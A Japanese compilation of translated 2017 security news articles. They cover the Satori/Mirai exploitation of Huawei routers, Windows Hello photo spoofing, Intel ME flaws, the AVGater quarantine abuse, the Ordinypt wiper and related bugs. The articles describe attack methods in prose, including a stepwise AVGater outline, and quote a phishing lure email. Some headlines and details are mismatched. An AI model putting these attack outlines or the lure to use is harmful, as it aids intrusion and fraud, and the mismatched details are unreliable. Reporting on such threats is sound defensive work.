     研究者達はファーウェイのホームルータ モデルに脆弱性を特定した。アドバイザリでの説明によると、この脆弱性は、OkikuもしくはSatoriと呼ばれるMiraiマルウェアの変種を拡散するために使用されている。
     Check Pointの研究者達は、火曜日にレポートを公開し、このフローがファーウェイのルータモデルHG532に存在していると発言している。このレポートは、オンライン上でこの脆弱性を悪用しようとする数十万の企てを追跡中であると発言している。
     OkikuもしくはSatoriは、11月23日にCheck Pointの研究者達によって最初に同定された。この発見に先立って、研究者達は、ファーウェイHG252デバイスへの立て続けの攻撃を世界中(米国、イタリア、ドイツ、エジプトが最も激しく攻撃されている)で観察したと発言している。
     「この発見が確認されると直ぐに、この脆弱性は、さらなる増殖を軽減するために個別にファーウェイに通知された」と、研究者達は発言している。
     金曜日、ファーウェイは、この脆弱性(CVE-2017-17215)を警告するために顧客に対してアップデートされたセキュリティ通知を発行した。このフローは、脆弱性のあるルータ上でリモートコードを実行するために、ポート37215に悪意あるパケットを送信することをリモートの敵に可能にすると顧客に告げている。
     このMiraiボットネットは、DNSプロバイダDynKrebs on SecurtiyのWebサイトを巨大なDDoS攻撃のターゲットにしたことで、2016年10月にトップニュースになった。オリジナルのMiraiマルウェアは、CCTVとDVRハードウェア中に発見されたDefaultのTelnet認証を使用することを可能にするフローを悪用した。
     Miraiのソースコードが公に利用可能になって以来、多くのハッカーは、このコードを改竄し、IoT(Internet of Things)デバイスをセキュリティ侵害する数を増やしてきた。殆どのハッカーは、接続されたデバイスと埋め込まれたシステムまわりの手抜きの防御を悪用していた。
     OkikuもしくはSatoriの場合、Check Pointの研究者達は、"Nexus Zeta"の名で通っている経験不足のハッカーが、この攻撃の背後にいるのではないかと疑っている。
     「この攻撃者の身元は当初謎であり、先進国加害者説から悪名高い脅威集団に至るまで推測された」と、研究者達は発言している。
     「偶々、このボットネットに属しているC&Cドメインへの登録に使用されているeMailアドレス(nexusiotsolutions[.]net)を発見したおかげで、我々は主犯("Nexus Zeta"のニックネームで脅威を与えている「役者」)に到達した」と、彼らは発言している。
     次に研究者達は、ドメイン登録用に使用されたeMailアドレスとHackForumsと呼ばれる人気のあるハッカーフォーラムで使用されているeMailアドレスとを相互参照した。
     「彼はそのようなフォーラムでは滅多に参加していないが、その幾つかは、彼がアマチュアの「役者」を明らかにするものであり、興味ある彼の最新の焦点は、MiraiのようなIoTボットネットを確立するためのイニシアチブに関するものであった」と、研究者達は発言している。
     ファーウェイ攻撃に先立つNexus Zetaの投稿の一つが、以下である。

     「こんにちは、私はMiraiボットネットをコンパイルするために私を助けてくれる人を探しています。私は、あなたが実行しなければならない全てのことは、それをコンパイルし、1 テラビット/秒のアクセスができることであると聞かされた。どうかMirai telnetボットネットをセットアップするために私を助けてください。」

     OkikuもしくはSatoriの攻撃は、今迄のMiraiの変種とは異なり、telnetベースのブルートフォース攻撃には依存していない。代わりに、この新しい変種は、ファーウェイHG532デバイス中の今迄未知のCVE-2017-17215脆弱性を悪用するためにポート37215への攻撃を実行している。
     この攻撃は、悪意あるペイロードをダウンロードし、ファーウェイのルータ上で実行するコマンド インジェクションに関連している。
     このフローは、Universal Plug and Play(UPnP)のこのルータの用法とTR-064(【訳注】 Technical Report 069 の省略形)の技術レポート仕様に結び付いている。TR-064は、埋め込まれているUPnPデバイスをローカルネットワークに追加するのを簡単にするために設計された仕様である。
     「このケースでは、ファーウェイ デバイス中のTR-064実装は、37215ポート(UPnP)を介してWANに晒された」と、研究者達は記述している。UPnPフレームワークは、ファームウェア アップグレード アクションを実行できる"DeviceUpgrade"をサポートしている。
     この脆弱性は、リモート管理者がシェル メタキャラクタ(【訳注】 *、? 等)を挿入することによってDeviceUpgradeプロセス中で任意のコマンドを実行することを可能にする。
     「これらが実行されると、この脆弱性悪用プログラムは、Default HUAWEIUPNPメッセージを戻し、『アップグレード』が開始される」と、研究者達は記述している。
     このペイロードの主目的は、手作業で細工されたUDPもしくはTCPパケットで、ターゲットを洪水にするように、そのボットに命令することである。
     「洪水アクションに使用されるパケットの数と、それらに随伴するパラメータは、C&Cサーバから送信される。また、このC&Cサーバは、サブネットアドレスと幾つかの有益なビットを使用して攻撃やサブネットの個別アドレスを渡すことができる」と、研究者達は発言している。
     ファームウェアによると、攻撃緩和策は、ルータの組み込みファイアーウォールの設定、Defaultパスワードの変更、キャリア側でファイアーウォールを使用することを含んでいる。
     Check Pointは、発見された脆弱性が、どのようにしてNexus Zetaの所有になったのかは依然として不明であると発言している。
     「昨年の他のもの同様にこのケースでも見られるように、悪用可能で貧弱なIoTセキュリティとリークされたマルウェアコードの結合は、未熟なハッカーが使用する時には、悲惨な結果を招くことことは明らかである」と、Check Pointは発言している。


    Windows 10 Hello顔認識は写真で誤魔化すことが可能
    The Register : Security (2017/12/20)
     あなたが最近のWindows 10 Creators Updatesをスキップしているのであれば、今、方針を変更しなさい。この顔認識セキュリティ機能(Hello)は、写真で欺くことができる。
     この脆弱性は、Full Disclosureでドイツの侵入テストチームSyssによってアナウンスされた。
     あなたが10月に出荷された修正バージョン(builds 1703 もしくは 1709)をインストールしている場合でさえ、顔認識は、この攻撃に耐性を持たせるにはスクラッチからセットアップしなければならない。
     この投稿で説明されているこの「簡単なスプーフィング攻撃」は、「認定ユーザの修正され印刷された写真」(当然、正面写真)の使用に関する、あらゆる変化形が存在しているので、攻撃者はロックされたWindows 10システムにログインすることができる。
     脆弱性のあるバージョンは、そのDefault設定と、「拡張アンチスプーフィング」機能を有効にしているWindows Helloの場合の両方であると、Syssは主張している。
     「『拡張アンチスプーフィング』が有効になっている場合、標的にされるWindows 10バージョンに応じて、他の属性が付属する少し修正の異なる写真が使用されなければならないが、攻撃者にとって、この追加の努力は取るに足らないものである。」
     この研究者達は、Windows 10 Pro, build 1703及びMicrosoft Surface Pro running 4 build 1607が稼働しているDell Latitudeに対して彼らの攻撃をテストした。
     彼らはSurface Proの設定を「拡張アンチスプーフィング」に変更しようとしたが、「LilBit USBカメラは、Default設定だけをサポートし、より安全な顔認識設定で使用することはできなかった」と主張している。
     この研究者達は、三つの概念の実証ビデオを公開した。

    https://youtu.be/Qq8WqLxSkGs
    https://youtu.be/GVKKcoOZHwk
    https://youtu.be/cayqU3WCOso


    Windows 10パスワードマネージャは、ハッカーにデータを盗むことを可能にしている
    Bitdefender : Blog (2017/12/18)
     著名なGoogleの開発者は、Windows 10にDefaultでインストールされている人気のあるパスワードマネージャ中の厄介な欠陥を発見した。ハッカーは、クリックジャッキングや悪意あるコード挿入テクニックを介してユーザのパスワードを手に入れることができる。
     Google Project Zeroの研究者Tavis Ormandyは、Windows 10バーチャルマシンを弄んでいる間に、これを発見した。
     彼は、chromium.org(ChromeブラウザとChrome OSの背後のオープンソース・プロジェクトに特化されたフォーラム)上でこの脆弱性の説明を提供している。
     「私はKeeperのことを耳にした、私は、彼らが特権UIをページに挿入する方法に関するバグを少し前にファイルしたことを覚えている。私はチェックした、そして彼らは、このバージョンでもまた同じことを実行している... これは、あらゆるWebサイトが、あらゆるパスワードを盗むことを可能にするので、Keeperセキュリティの完全な情報漏洩である」と、Ormandyは記述している。
     彼は、攻撃者が任意のTwitterユーザのパスワードを盗むために、このフローを活用する方法を示す概念の実証を提供している。
     Keeperの背後にいる人々は、このニュースの噂を耳にした。彼らは、このバグを認識し、大急ぎでそれを修正した。
     「この問題を解決するために、我々は"Add to Existing"フローを削除した、そして、将来に於いて、この潜在的な脆弱性を防止するために追加のステップを取った」と、Keeperチームは、この企業のブログで記述している
     「この潜在的な脆弱性によって顧客が不利な影響を受けない場合でさえ、我々は、全ての報告されたセキュリティ問題、脆弱性、バグレポートを深刻に受け止めている」と、「セキュリティと顧客情報とデータの保護は、Keeperの再優先事項である。我々がこの問題を通知された時から24時間以内に、それを解決し、自動的な拡張のアップデートを顧客に発行した。」
     今まで、この企業のモバイルとデスクトップ アプリケーションは影響を受けないままであり、このバグによって影響を受けたとする顧客からのレポートは存在していない。ブラウザ拡張だけに脆弱性があるようだ。
     このバグの公開以来、Edge, Chrome, FirefoxのKeeperブラウザ拡張は、修正に関する自動アップデートを受け取っている。しかしながら、Safariユーザは、Keeperのダウンロードページを訪問しバージョン 11.4.4(もしくは最新版)を手動でダウンロードしインストールする必要がある。
     このようなフローはパスワードマネージャの目的全体を打ち負かすし、Windows 10がユーザのパスワードを格納するために、このソフトウェアを信頼しているという事実は、Ormandyの発見をより心配なものにしている。願わくば、Keeperチームが将来を通じてこのようなバグを作らないことを。


    Synapticキーロガーが存在するHP(ヒューレットパッカード)のラップトップであるか否かをチェックし、そのキーロガーを削除する方法
    BleepingComputer : News>Security (2017/12/11)
     先週、BleepingComputerは、一部のHPのラップトップが、どのようにしてSynapticキーボードドライバの特定のバージョン中にキーロガー(実際には、デバッグトレース)を持つことになったかをカバーした。このキーストロークを記録するドライバーの能力をDefaultで無効にしても、依然として、HPラップトップの全てのユーザが修正しなければならない深刻なセキュリティリスクがある。
     我々が、この特定のドライバに関してあなたのシステムをチェックする方法の説明を始める前に、このキーロガーが悪意ある理由から、そのドライバ中に配置されていなかったことに注目することは重要である。これは、開発している間にそのドライバ中のバグの発見を支援するためにドライバ開発者によって使用されていたものではないように思われる。残念ながら、ミスによって、このデバグトレース関数は、製品がリリースされる前にこのドライバから削除されなかった。
     そう言うわけなので、あなたがHPラップトップを所有しているのであれば、あなたのラップトップは、このデバッグトレース(もしくは、キーロガー)機能を含むドライバをインストールされている可能性がある。あなたが影響を受けるドライバを所有しているか否か確認するには、C:\Windows\System32\drivers に進み、以下に示したように、SynTP.sys ドライバのプロパティに注目しなさい。


    SynTP.sysのプロパティ

     この製品バージョン(上図のProduct version)が、19.3.11.37 16Aug16 としてリストされている場合、このキーロガー(もしくは、デバッグトレース)機能を含むドライバーをインストールされている。
     このドライバがインストールされている人々に関しては、HPのサポートページにリストされている(リンクは日本語サイトに変更しています)あなたのラップトップで利用可能な最新のドライバを即座にダウンロードしなさい。あなたが、影響を受けるバージョンをインストールされていない場合であっても、この問題は、他のバージョンにも同様に影響を与える可能性があるので、あなたのラップトップ用の最新のドライバがリストされている場合には、私はアップデートをインストールするよう提案する。
     アップデートをインストールしたら、SynTP.sysドライバは、デバッグトレースを削除されたバージョンに置き換えられ、キーログの能力はもはや存在しなくなるだろう。あなたがラップトップのソフトウェアを定期的にアプデートしているなら、このアップデートは、研究者Michael MyngがHPに対してこのバグを報告した2017年11月初めにリリースされているので、既にインストールされているかもしれない。


    Windows 7 アップデートは80248015エラーを与える。その理由と修正方法
    FossBytes : News (2017/12/08)
     ロンドンでのBlackHat Europeカンファレンスで、研究者Mark ErmolovとMaxim Goryachyは、Intel ME 11中のスタック・バッファオーバーフローのバグ(CVE-2017-5705, CVE-2017-5706, CVE-2017-5707)を明らかにした(PDF)
     これらのバグは、「そのデバイス上で実行されている殆どのデータとプロセスへの深層レベルでのアクセス」を攻撃者に与え、’God Mode’とも呼ばれる能力をONにする。
     この攻撃者は、2015年以降に出荷されたインテル-インサイド マシン上で、署名されていないコードを実行したり、周辺機器とコンポーネントの制御を奪ったり、もしくは、コンピュータをOFFにする改竄さえすることができる。このマシンは通常通り機能する(ユーザとOSは、何が発生しているのか全く知ることなく)。
     先月、Intelは、セキュリティアドバイザリでこの脆弱性について話し、それらを修正するパッチもリリースしている。しかし、これらのパッチを時宜にかなって推し進める責任を持っているのは各メーカーである。
     この研究者によると、ME(Intel Management Engine)領域に書き込みアクセス権を持つ攻撃者が、Intel MEチップのファームウェアを何とかダウングレードしたら、これらのセキュリティパッチは役に立たないものになる。
    これは、IntelがMEをチップに入れ始めた2007年に遡るので、影響を受けるデバイスのリストは拡大する可能性がある。しかしながら、ターゲットマシンに侵入するために、攻撃者は物理的なアクセスを要求するか、リモートログイン認証を盗まなければならないだろう。例えば、ターゲットマシンが、IT管理者によって管理されている企業ネットワークの一部である場合である。
     MEチップはアンチマルウェアツールの守備範囲外で操作するので、この脆弱性からユーザを守ることのできるセキュリティソフトは存在しない。喩え、オペレーティングシステムであろうとも。
     ありがたいことに、彼らのユーザのためにMEチップの脆弱性を塞ぐ気があるPCメーカーが幾つか存在している。


    Windows 7 アップデートは80248015エラーを与える。その理由と修正方法
    BleepingComputer : News>Security (2017/12/04)
     あなたがWindows 7の新しいWindows Updateを検索したなら、十中八九80248015エラーを得るだろう。このエラーは、我々のフォーラム、Microsfotフォーラム、他のサイトでも報告されており、全てのWindows 7ユーザに影響を与えている問題のようである。
     Ghacksによって収集された情報によると、このエラーは、Windows Updateによって使用されたファイル(誤って2017年12月3日を期限に設定されている)によって発生している。このファイルは有効期限切れなので、ユーザがWindows Updateを実行すると、これは、自動的に以下の何方かのエラーで失敗する。

    ・ Windowsは新しいアップデートを確認できません。このコンピュータで利用できる新しいアップデートを確認中にエラーが発生しました。エラー: コード 80248015 Windows Updateで不明なエラーが発生しました。
    ・ 現在サービスが実行されていないため、Windows Update で更新プログラムを確認できません。このコンピューターの再起動が必要な可能性があります。

     私のWindows 7のPCで実行したWindows Updateのテストでのこのエラーの例を以下に示す。


    Windows 7 Update 80248015エラー

     あなたが掘り下げたいのであれば、Windows Event Logsで類似の情報と共に複数のエラーを発見するだろうが、詳細とは言い難い。


    エラー80248015に関するWindows 7 エラーログ

     残念なことに、あなたのコンピュータの再起動やWindows Updateトラブルシューティングツールを使用しても、この問題は修正されない。
     Microsoft AnswersフォーラムのスレッドでArgHereBeDragonsと名乗るユーザによると、このエラーはC:\Windows\SoftwareDistribution\AuthCabs\authcab.cabファイルで発生しているようである。このCABファイルは、2017/12/03 11:59:25(日本時間 2017/12/04 04:59:25)を期限とするauthorization.xmlと呼ばれるXMLファイルを含んでいる。ユーザが、この期限時刻の後にWindowsをアップデートしようとすると、Windows Updateは、このファイルの期限を原因として失敗する。


    期限切れのファイル

     残念ながら、これらのファイルはMicrosoftによってデジタル署名されているので、このXMLファイルを編集することや、期限の日付を延長することは不可能であり、このファイルへのあらゆる変更は、このファイルをWindows Updateで使用されないようにしてしまうだろう。


    署名されているauthcab.cabファイル

     この問題を修正するには、あなたのコンピュータの時計を2017年12月02日に戻し、もう一度Windows Updateを実行しなさい。私の場合は、これでWindows Updateをダウンロードしインストールすることができた。

    2017/12/04 Update
     一部の人達は、Born City(【訳注】 Born's Tech and Windows Worldのサイト)が以下で説明している修正を使用すると、hourglass loop(【訳注】 砂時計表示の無限ループ)もしくは、白画面表示を発生すると報告している。あなたにとって時刻の変更が動作するのであれば、現時点では、この方法が安全な修正方法かもしれない。

     あなたが、Windows Update設定変更画面で「Windowsの更新時にMicrosoft製品の更新プログラムを入手し、新しいオプションのMicrosoftソフトウェアについて確認する」をOFFにした場合に、この問題を修正するかもしれない動作する可能性のある他の修正が、テクノロジサイトBorn Cityによって発見されている(【訳注】 2017/12/05 13:04時点で、このリンクはアクセスできない状態です)。


    この設定をOFFにする

     これは単なる応急措置である。最終的には、我々は、Windows 7ユーザがauthcab.cabファイルをダウンロードしアップデートするためのMicrosoftの緊急の修正のリリースを待つ必要がある。


    Acer, Dell, Fujitsu, HP, Lenovo, Panasonicは、Intel MEセキュリティバグの影響を受ける
    BleepingComputer : News>Security (2017/11/23)
     Acer, Dell, Fujitsu, HP, Lenovo, Panasonicは、Intelチップセットを組み込んだ製品が、8つのセキュリティフロー(ハッカーがデバイスを乗っ取ることを可能にする)の影響を受けることを確認した。
     Intelは、月曜日、セキュリティ・アドバイザリ中で、これらのフローに関する詳細を公開した。8つのバグは、Intel Management Engine (ME), Intel Server Platform Services (SPS), Intel Trusted Execution Engine (TXE)のようなIntel CPUコア・テクノロジに影響を与える。
     Intelは、以下のIntel製品中にこれらのテクノロジを配備していた。

    6th, 7th & 8th Generation Intel Core Processor Family
    Intel Xeon Processor E3-1200 v5 & v6 Product Family
    Intel Xeon Processor Scalable Family
    Intel Xeon Processor W Family
    Intel Atom C3000 Processor Family
    Apollo Lake Intel Atom Processor E3900 series
    Apollo Lake Intel Pentium
    Celeron N and J series Processors

     以下のファームウェア・バージョンを使用している製品だけが影響を受ける。

    ME firmware versions 11.0/11.5/11.6/11.7/11.10/11.20
    SPS Firmware version 4.0
    TXE version 3.0

     多くのPCとNotebook企業は、彼らが世界中のユーザーに販売したサーバ、デスクトップ、ノートブック モデルに脆弱性のあるファームウェア・バージョンを実行しているCPUを組み込んでいた。
     Intelが、アドバイザリを公開した時点では、Intelベースのデスクトップとラップトップに脆弱性のあるファームウェア・バージョンを、どの製品に配備したのかは明らかになっていなかった。

    900を超えるPCとLaptopモデルが影響を受ける

     週が進むにつれて、新しい情報が明るみに出てきた。以下のベンダーは、脆弱性のあるファームウェアを実行しているIntel製品が使われている製品のリストを公開した。

    企業名 モデルの数 パッチ
    Acer 242 なし
    Dell 214 なし
    Dell Server 16 なし
    Fujitsu(PDF) 165 なし
    HPE Server 数は明らかではない 一部あり
    Intel 34 なし
    Lenovo 222 一部あり
    Panasonic 12 なし

     全てのベンダがパッチをリリースしているわけではない、そして、ユーザは、利用可能になったら、彼らのデバイス用のファームウェアアップデートをダウンロードするために、これらのページを訪問するようにしなさい。
     あなたが、サーバ、デスクトップ、もしくはラップトップ・ベンダや、これらのページのモデルを見つけ出せないのであれば、Intelは、ユーザのPCをスキャンし、最近公開されたバグに影響を受けるか否かを、そのユーザに告げるWindowsとLinux用のツールをリリースしている。Windowsに関しては、ユーザはスキャン結果を閲覧するために、Intel-SA-00086-GUI.exeファイルを実行しなさい(以下の画像参照)。


    Intel検出ツール

     サイバーセキュリティ企業Rapid7も、これらのフローのリスクを強調するために、企業顧客用の警告を発光している。Rapid7によると、これは専門家が以下のことを実行するために使用される。

    ・ ME/SPS/TXEに成りすます、それ故、ローカル・セキュリティ機能の証明正当性に影響を与える
    ・ ユーザとオペレーティングシステムの可視性の外で任意のコードをロードし実行する。
    ・ システムクラッシュもしくはシステム不安定を発生させる


    LibXLライブラリ中の複数の脆弱性はRCE攻撃に対してドアを開いている
    Kaspersky : ThreatPost (2017/11/17)
     研究者は、Excelファイルを読むために使用されるLibXL C ライブラリ中に7つの脆弱性を同定した。夫々の脆弱性は、共通脆弱性評価システム(CVSS)スケールでの重大度で8.8と評価されている。
     今週このフローを公開したCisco Talosの研究者によると、攻撃者は夫々の脆弱性を悪用でき、特別に細工されたXLSファイルを使用して、リモートコード実行(RCE)攻撃を実行することができる。
     「LibXLは、Windows, Mac, Linuxをサポートしている。これは、Excel 97 からXLSファイルの現行バージョンまでのMicrosoft Excelファイルフォーマットのファイルを読むことができる」と、Cisco Talosの研究者は発言している。
     「このライブラリは、CRANレポジトリを介してRプログラミング言語中にインストールすることのできる'readXL'パッケージによって使用される」と、研究者は記述している。彼らは、LibXLが、xls2csvツール(スプレッドシートのテキストファイルを再びコード化し、コンマで区切られた値としてそれらを保存するコマンドライン・スクリプト)の一部であるとも追加している。
     夫々の脆弱性は、Cisco Talosチームの研究者Marcin Nogaによって発見された。
     7つの脆弱性の一つ(CVE-2017-2896)は、フィッシングキャンペーンを介して悪意あるXLSファイルを送信することを敵対者に可能にし、開かれると、リモートコード実行中の結果としてターゲットのシステムでメモリ損壊の引き金を引くだろう。
     「悪用可能な境界を越えた書き込み脆弱性は、libxls 1.4のxls_mergedCells関数中に存在している」と、Cisco Talosの研究者は記述している。
     二つ目の脆弱性(CVE-2017-2897)は、libxls 1.4のread_MSAT関数中に存在していると、研究者は発言している。
     研究者によると、「特別に細工されたXLSファイルは、リモートコード実行の結果として、メモリ損壊を発生させることができる。攻撃者は、この脆弱性の引き金を引く悪意あるXLSファイルを送信することができる。」
     脆弱性CVE-2017-12110に関しては、このフローは、LibXL 1.4のxls_appendSST関数中に存在する悪用可能なInteger(単整数型)オーバーフロー脆弱性に結び付けられると、研究者は発言している。Integerオーバーフローは、計算処理が、それを格納するInteger型の最大サイズを超える値を生成する時に生じる条件であると説明される。
     他の脆弱性は、スタックベース バッファオーバーフロー(CVE-2017-2919)、二つのIntegerオーバーフロー(CVE-2017-12108CVE-2017-12109)、そして、境界外書き込み(CVE-2017-12111)のバグである。
     Cisco Talosによると、この脆弱性群を解決するためのアップデートは、LibXL SVNリポジトリを介してのみ利用可能である。


    アンチウィルス・エンジン設計フローは、システムに噛みつかれる手助けをする
    BleepingComputer : News>Security (2017/11/10)


    画像をクリックすると拡大します。

     幾つかのアンチウィルス製品は、今迄に検出されたマルウェアをユーザのオペレーティングシステムの重要な部分に送り出す「隔離から復元」機能の悪用をマルウェアやローカルの攻撃者に可能にする設計フローの影響を受け、マルウェアが昇格した特権でブート永続性を取得することを手助けする。
     オーストリアのサイバーセキュリティ企業Kapschのセキュリティ監査役Florian Bognerが、このフローを発見した。そして、彼は、AVGaterのコードネームで、このフローを追跡し続けている。

    一部のアンチウィルス企業は、アップデートをリリースしている

     Bognerは、彼がテストし脆弱性を発見した全てのアンチウィルスメーカーに通知したと発言している。本日、この研究者は、一部の企業がアップデートをリリースした後、彼の発見を公開した。
     このリストには、Trend Micro, Emsisoft, Kaspersky Lab, Malwarebytes, Ikarus, Check PointのZone Alarmが含まれている。
     彼は他の企業も、数日のうちに修正をリリースするだろうと発言し、彼がテストしていない他のアンチウィルス・エンジンに脆弱性が存在している可能性を除外しないとも発言している。

    AVGaterはどのように動作するのか

    このフローがどのように動作するのかをより良く理解するために、脆弱性攻撃が成功するシナリオを簡単に解説する。

    Step 1 - ユーザがマルウェアで感染させられる。

    Step 2 - AVエンジンがマルウェアを検出する。

    Step 3 - AVエンジンがマルウェアを隔離室に移動する。

    Step 4 - 非管理者権限のローカル攻撃者が、影響を受けるシステム上で脆弱性悪用プログラムを実行する。これは、隔離されているサンプルの本来のファイルの位置を操作するために、NTFSディレクトリ・ジャンクションを使用する。

    Step 5 - 攻撃者は、「隔離からの復元」操作を開始する。。

    Step 6 - 感染したファイルは、その場所に送り返されるが、NTFSジャンクションは、そのファイルを C:\Windows 内部の重要なフォルダに中継する。非管理者権限のユーザは、このフォルダの内部にあるファイルをコピーできないが、アンチウィルス・プログラムは、システム権限の下で動作している。このことは、隔離室から復元されたファイルが、エラーや警告を発生させることなしに、そのフォルダに送られることを意味している。

    Step 7 - Windowsのサービスの一部やコアプロセスは、特定のWindowsディレクトリに格納されている全てのDLLをロードするように設計されているため、ユーザが彼のPCを次回に再起動した時、今まで隔離されていたファイルは、Windowsサービスやホワイトリストされたアプリケーションとしてスタートアップで実行される。

     攻撃全体は、ブート永続性と特権の昇格の両方を可能にしているため、恐ろしく狡猾であるが、そのマシンに物理的にアクセス可能(殆どの場合、重大な制限)な攻撃者に依存している。
     それであるにも拘わらず、AVGataを利用できるとするシナリオがある。例えば、ユーザがコンピュータを共有している、会社、教育機関、政府組織のような共有環境、WindowsベースのATM等である。
    EmsisoftとMalwarebytesのアンチウィルスを脆弱性攻撃する「概念の実証」コードを公開したBognerは、ユーザが、自身の所有するアンチウィルス製品を常にアップデートすることによって、企業環境の場合では、隔離室からファイルを復元することをユーザに許可しないようにすることによって、AVGataを防御することができると発言している。


    Ordinypt身代金要求型マルウェアは故意にファイルを破壊する。現在のターゲットはドイツ
    BleepingComputer : News>Security (2017/11/09)
     Ordinyptと名付けられた身代金要求型マルウェアの新種は、現在ドイツをターゲットにしている。そして、ユーザのドキュメントを暗号化する代わりに、この身代金要求型マルウェアは、ランダムなデータでファイルを書き改める。
     この身代金要求型マルウェアは、その脅迫文の一つが、ID-Ransomwareにアップロードされた後、Michael Gillespieによって最初に発見された。この月曜日、G Dataのセキュリティ研究者Karsten Hahnは、サンプルを解析し、ドイツ語で書かれたeMailを介してドイツ人ユーザだけをターゲットにし、間違いのないドイツ語で脅迫文が配布されていることを発見した。
     最初、Michaelによって発見された時、この身代金要求型マルウェアは、適切な名前がなくてHSDFSDCryptと名付けられたが、G DataによってOrdinyptに変更された。
     原初のPetya身代金要求型マルウェアが配布される方法に類似して、Ordinyptもまた、求人広告に応募するために送信された履歴書であるかのように装っている。これらのeMailは、二つのファイル(履歴書を送信しているかのような婦人のJPG画像と、履歴書と職務経歴書を含むZIPファイル)を含んでいる。
     これらの添付ファイルは、Viktoria Henschel(Bewerbungsfoto.jpgとViktoria Henschel)、Bewerbungsunterlagen.zipと名付けられている。


     このZIPアーカイブは、それらが異なるファイルであると思わせてユーザを欺く、使い古された二重拡張子とカスタムアイコン・トリックを使用する二つのEXEファイルを含んでいる。このケースでは、PDFファイル。
     Defaultでファイル拡張子を非表示にしているWindows PCでは、このEXE拡張子は表示されない。そして、ユーザはPDF部分だけを見るだろう。ユーザを騙し、このファイルが合法的なPDFであり、実行ファイルではないと信じさせるには十分である。


    Ordinyptはファイルをランダムなデータで置き換える

     何れかの実行ファイルを実行することは、Ordinypt身代金要求型マルウェア(いっそのこと、Ordinyptワイパー)を起動する。Ordinyptは、実際にはワイパーである。何かを暗号化して悩ませるのではなく、ファイルをランダムなデータで単に置き換えるだけなので、身代金要求型マルウェアではない。
     リバースエンジニアPhilipp Mackensenによると、Ordinyptは、ファイルの内容をランダムに生成した文字列(大文字、小文字、数字で構成される)で置き換える。

    9 Nov
    Army Nael B. Leido @armynaelによる投稿

    Replying to @demonslay335 and 4 others
    It looks like its not encrypted before. It didn't even read the content of the file looking on its code. Also tested 300MB+ bait file and was replaced with a 21KB (very unlikely to be encrypted copy).

    Philipp Mackensen @PMackensenによる投稿
    File names and content are generated by the same function (only needs a length as input) which randomly generates a string that consists of uppercase, lowercase and numeric characters . File size can differ between 8KB and 24KB (also random). Doesn't encrypt .png files tho.

     Philippは更に、このワイパーは、あらゆる他の身代金要求型マルウェアのように、ファイルの検索を実行するが、「実際にはゴミ・ファイルである"pseudo-encrypted-file"(擬似暗号化ファイル)を作成し、その後、オリジナルのファイルを削除するだけである」と、Bleeping Computerに告げている。Philippは更に、このマルウェアがワイパーであるという事実を隠蔽している間、このマルウェアは、ほぼ間違いなく、身代金要求型マルウェアのように動作していると、続けている。
     ランダムなデータを生成するために使用されているものと同じアルゴリズムが、14の英数字で構成される新しい"pseudo-encrypted-file's"名を生成するために使用されてもいる。


     Ordinyptは、新しいファイルが時々オリジナルのサイズの半分を超えるが、その有害な性質を隠そうともしない。


     Ordinyptは、ファイルを破壊した全てのフォルダに脅迫文をドロップする。この脅迫文は、Wo_sind_meine_Dateien.htmlと名付けられている。英文に翻訳するとWhere_are_my_files.html.(私のファイルは何処)である。


    Ordinyptは身代金要求型マルウェアを装うワイパーである

     故意にデータを破壊する挙動は、脅迫文がコード化されていることからも明らかである。
     通常、身代金要求型マルウェア株は、感染IDとBitcoinアドレス、犠牲者がその身代金要求型マルウェアのオペレータにコンタクトし、身代金の支払いを確認するためのダークWeb URL、もしくは、eMailアドレスを表示する。
     Ordinyptは、感染IDをリストしないし、身代金要求型マルウェアの作者がIDのようなものを抽出できるファイルを要求することもない。
     その代わりに、Ordinyptの脅迫文は、JavaScript関数を使用し、101のハードコードされたウォレット・アドレスのリストからランダムにBitcoinのアドレスを選択する。


    JavaScript(画像をクリックすると拡大します。)


    ハードコードされたウォレット・アドレス(画像をクリックすると拡大します。)

     更に、この模造身代金要求型マルウェアの作者に接触し、支払いを確認する方法は存在しない。全ての証拠は、誰かが、コンピュータに故意にダメージを与えるために、Ordinyptをコーディングしたことを指摘している。
     求人eMailを介して人事部をターゲットにすることは、ドイツを本拠とする一部の企業の業務に損害を与えるための意図的なキャンペーンであることを雄弁に語っている。
     Ordinyptは、身代金要求型マルウェアを装う最初のワイパーではない。最も有名なのは、6月にウクライナを攻撃し、速やかに世界中に拡散した模造身代金要求型マルウェアNotPetyaである。

    IOC

    Ordinypt / HSDFSDCrypt Hash:

    SHA256: 085256b114079911b64f5826165f85a28a2a4ddc2ce0d935fa8545651ce5ab09

    Ordinypt / HSDFSDCryptスパムeMail文(Bleeping Computerによる英文翻訳)

    Dear Sir or Madam,

    Enclosed you will receive my application for your job advertised at the Employment Agency. Please see my detailed and attached application documents for the reasons why I am able to fill the vacant position optimally and that your experience has many advantages for your company.

    I'm glad if I can introduce myself once again.

    Best regards,

    Viktoria Henschel

    Ordinypt / HSDFSDCrypt脅迫文
     ドイツ語のみ。英文翻訳が行われていないので省略。


    ブラザーのプリンターは、RDoS(リモートDoS)攻撃を許容する
    Kaspersky : ThreatPost (2017/11/07)
     ブラザーによって製造販売されているネットワーク機能を持つ個人消費者並びに企業向けプリンターは、未パッチの脆弱性を含んでいる。攻撃者は、この脆弱性を悪用して、そのデバイスにDoS攻撃を発生させることができる。
     月曜日、TrustwaveのSpiderLabsの研究者は、最初の開示後およそ一月、ブラザーに連絡をとり、多くの成果のない試み(10月3日のサポートとのライブチャットを含む)の後、月曜日に、この問題を公開した。Threatpostによるコメントの要求は、無視されたまま公開された。
     この脆弱性は、Debut埋込型Webサーバが付属する全てのブラザー製プリンタが影響を受ける、そして、この脆弱性は、当該プリンタに単一の不正な形式のリクエストをすることで悪用することができると、Trustwaveは発言している。TrustwaveのThreat Intelligence(脅威情報)マネージャKarl Siglerは、Debut Webフロントエンドは、15年経っており、バージョン 1.20と、それ以前のバージョンが影響を受けると、発言している。
     「ネットワークの観点から、当該プリンタへの攻撃は、通常のHTTPトラフィックのようにみえる。この攻撃は、DoSを達成するために、数分毎に単一のリクエストを送信しているだけである」と、「攻撃者全てにとって必要なことは、当該プリンタが、インターネットにアクセスできることである。そうでなければ、攻撃者は、ターゲットのネットワークへのアクセスを取得する必要がある(ソーシャルネットワークが思い浮かぶ)」と、SiglerはThreatpostに告げている。
     Trustwaveによって行われたShodan検索によると、ブラザーのプリンタの小さなパーセンテージではあるが、オンラインに接続されているデバイス14,989台が影響を受けると、Siglerは発言している。
     「大抵の場合、攻撃者は同一のネットワーク上に存在する必要がある」と、Siglerは認めている。
